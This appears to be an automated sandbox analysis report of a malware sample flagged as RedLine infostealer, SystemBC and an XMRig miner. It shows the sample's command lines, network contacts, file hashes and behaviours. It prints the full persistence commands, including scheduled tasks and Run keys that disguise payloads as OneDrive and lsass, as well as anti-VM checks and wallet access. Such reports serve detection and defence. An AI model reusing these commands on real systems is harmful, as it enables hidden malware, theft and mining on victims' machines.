C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 07:16 /du 23:59 /sc daily /ri 1 /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 844

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

Network

Country Destination Domain Proto
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 maper.info udp
DE 148.251.234.93:443 maper.info tcp
DE 148.251.234.93:443 maper.info tcp
US 8.8.8.8:53 pool.hashvault.pro udp
US 142.202.242.43:80 pool.hashvault.pro tcp

Files

memory/1380-54-0x00000000013E0000-0x00000000013F8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 69a1e2d4a32861415512e5f95a4a0ac4
SHA1 ba541601b33fa5c7572ba3593e20ad819f2930d2
SHA256 153f22c784edd386ebb5c691e3fd78439860ad6e080c3edd6b17265d045d5382
SHA512 f9c0b107d6646acb17298d1d36708c882003772c9fa478117f5e0bf06945e93f90b4af000508550ec78ec3963ef33910ff5a2c11f8875f2a925880f64cd3e6ba

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LY4EYE6F01FIQ0MOR916.temp

MD5 69a1e2d4a32861415512e5f95a4a0ac4
SHA1 ba541601b33fa5c7572ba3593e20ad819f2930d2
SHA256 153f22c784edd386ebb5c691e3fd78439860ad6e080c3edd6b17265d045d5382
SHA512 f9c0b107d6646acb17298d1d36708c882003772c9fa478117f5e0bf06945e93f90b4af000508550ec78ec3963ef33910ff5a2c11f8875f2a925880f64cd3e6ba

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 69a1e2d4a32861415512e5f95a4a0ac4
SHA1 ba541601b33fa5c7572ba3593e20ad819f2930d2
SHA256 153f22c784edd386ebb5c691e3fd78439860ad6e080c3edd6b17265d045d5382
SHA512 f9c0b107d6646acb17298d1d36708c882003772c9fa478117f5e0bf06945e93f90b4af000508550ec78ec3963ef33910ff5a2c11f8875f2a925880f64cd3e6ba

memory/1636-69-0x000000001B100000-0x000000001B3E2000-memory.dmp

memory/1296-71-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 69a1e2d4a32861415512e5f95a4a0ac4
SHA1 ba541601b33fa5c7572ba3593e20ad819f2930d2
SHA256 153f22c784edd386ebb5c691e3fd78439860ad6e080c3edd6b17265d045d5382
SHA512 f9c0b107d6646acb17298d1d36708c882003772c9fa478117f5e0bf06945e93f90b4af000508550ec78ec3963ef33910ff5a2c11f8875f2a925880f64cd3e6ba

memory/1636-77-0x0000000002510000-0x0000000002590000-memory.dmp

memory/1296-78-0x0000000002930000-0x00000000029B0000-memory.dmp

memory/1848-80-0x00000000028B0000-0x0000000002930000-memory.dmp

memory/1296-82-0x0000000002930000-0x00000000029B0000-memory.dmp

memory/1848-81-0x00000000028B0000-0x0000000002930000-memory.dmp

memory/1636-84-0x0000000002510000-0x0000000002590000-memory.dmp

memory/1848-83-0x00000000028B0000-0x0000000002930000-memory.dmp

memory/916-85-0x00000000020E0000-0x0000000002160000-memory.dmp

memory/1296-79-0x0000000002930000-0x00000000029B0000-memory.dmp

memory/916-86-0x00000000020E0000-0x0000000002160000-memory.dmp

memory/1296-87-0x0000000002930000-0x00000000029B0000-memory.dmp

memory/1636-76-0x0000000002510000-0x0000000002590000-memory.dmp

memory/1636-88-0x0000000002510000-0x0000000002590000-memory.dmp

memory/1848-89-0x00000000028B0000-0x0000000002930000-memory.dmp

memory/916-90-0x00000000020E0000-0x0000000002160000-memory.dmp

memory/1848-91-0x00000000028A0000-0x00000000028AE000-memory.dmp

memory/1848-92-0x0000000002A70000-0x0000000002A80000-memory.dmp

memory/1636-93-0x0000000002510000-0x0000000002590000-memory.dmp

memory/1636-94-0x0000000002510000-0x0000000002590000-memory.dmp

memory/1636-95-0x0000000002510000-0x0000000002590000-memory.dmp

memory/916-96-0x00000000020E0000-0x0000000002160000-memory.dmp

memory/916-97-0x00000000020E0000-0x0000000002160000-memory.dmp

memory/1636-98-0x0000000002510000-0x0000000002590000-memory.dmp

\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 69a1e2d4a32861415512e5f95a4a0ac4
SHA1 ba541601b33fa5c7572ba3593e20ad819f2930d2
SHA256 153f22c784edd386ebb5c691e3fd78439860ad6e080c3edd6b17265d045d5382
SHA512 f9c0b107d6646acb17298d1d36708c882003772c9fa478117f5e0bf06945e93f90b4af000508550ec78ec3963ef33910ff5a2c11f8875f2a925880f64cd3e6ba

memory/1912-113-0x000000000286B000-0x00000000028A2000-memory.dmp

memory/1912-112-0x0000000002864000-0x0000000002867000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 08e3930a42197a422d064569c4778997
SHA1 74832aa332b48422e5d448f5099b397e84c18712
SHA256 322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512 b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 08e3930a42197a422d064569c4778997
SHA1 74832aa332b48422e5d448f5099b397e84c18712
SHA256 322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512 b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

memory/1244-116-0x000000013F850000-0x000000014021A000-memory.dmp

memory/1812-123-0x0000000000400000-0x000000000083B000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 69a1e2d4a32861415512e5f95a4a0ac4
SHA1 ba541601b33fa5c7572ba3593e20ad819f2930d2
SHA256 153f22c784edd386ebb5c691e3fd78439860ad6e080c3edd6b17265d045d5382
SHA512 f9c0b107d6646acb17298d1d36708c882003772c9fa478117f5e0bf06945e93f90b4af000508550ec78ec3963ef33910ff5a2c11f8875f2a925880f64cd3e6ba

\??\c:\users\admin\appdata\roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/1812-137-0x0000000004380000-0x0000000004381000-memory.dmp

memory/1812-138-0x0000000004360000-0x0000000004361000-memory.dmp

memory/1812-139-0x0000000004370000-0x0000000004371000-memory.dmp

memory/1812-140-0x0000000004350000-0x0000000004351000-memory.dmp

memory/1800-141-0x0000000001210000-0x0000000001630000-memory.dmp

memory/316-143-0x0000000002650000-0x00000000026D0000-memory.dmp

memory/316-142-0x0000000002650000-0x00000000026D0000-memory.dmp

memory/316-144-0x0000000002650000-0x00000000026D0000-memory.dmp

memory/1800-145-0x0000000001210000-0x0000000001630000-memory.dmp

memory/1800-146-0x0000000003300000-0x0000000003340000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/1812-157-0x0000000000400000-0x000000000083B000-memory.dmp

memory/2032-161-0x00000000000F0000-0x0000000000110000-memory.dmp

memory/904-160-0x000000013F2E0000-0x000000013FCAA000-memory.dmp

memory/1800-162-0x0000000001210000-0x0000000001630000-memory.dmp

memory/1812-163-0x0000000000400000-0x000000000083B000-memory.dmp

memory/2032-164-0x00000000004A0000-0x00000000004C0000-memory.dmp

memory/112-165-0x0000000140000000-0x0000000140029000-memory.dmp

memory/1812-166-0x0000000000400000-0x000000000083B000-memory.dmp

memory/2032-168-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1800-169-0x0000000003300000-0x0000000003340000-memory.dmp

memory/112-170-0x0000000140000000-0x0000000140029000-memory.dmp

memory/1812-171-0x0000000000400000-0x000000000083B000-memory.dmp

memory/2032-173-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/2032-174-0x00000000004A0000-0x00000000004C0000-memory.dmp

memory/1812-176-0x0000000000400000-0x000000000083B000-memory.dmp

memory/2032-177-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1812-180-0x0000000000400000-0x000000000083B000-memory.dmp

memory/2032-181-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1812-184-0x0000000000400000-0x000000000083B000-memory.dmp

memory/2032-185-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1812-188-0x0000000000400000-0x000000000083B000-memory.dmp

memory/2032-190-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1812-192-0x0000000000400000-0x000000000083B000-memory.dmp

memory/2032-194-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1812-196-0x0000000000400000-0x000000000083B000-memory.dmp

memory/2032-197-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1812-200-0x0000000000400000-0x000000000083B000-memory.dmp

memory/2032-201-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1812-204-0x0000000000400000-0x000000000083B000-memory.dmp

memory/2032-206-0x0000000140000000-0x00000001407EF000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-06 05:11

Reported

2023-05-06 05:13

Platform

win10v2004-20230221-en

Max time kernel

150s

Max time network

152s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

SystemBC

trojan systembc

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Software\Wine C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Software\Microsoft\Windows\CurrentVersion\Run C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Roaming\\dllhost.exe'\"" C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
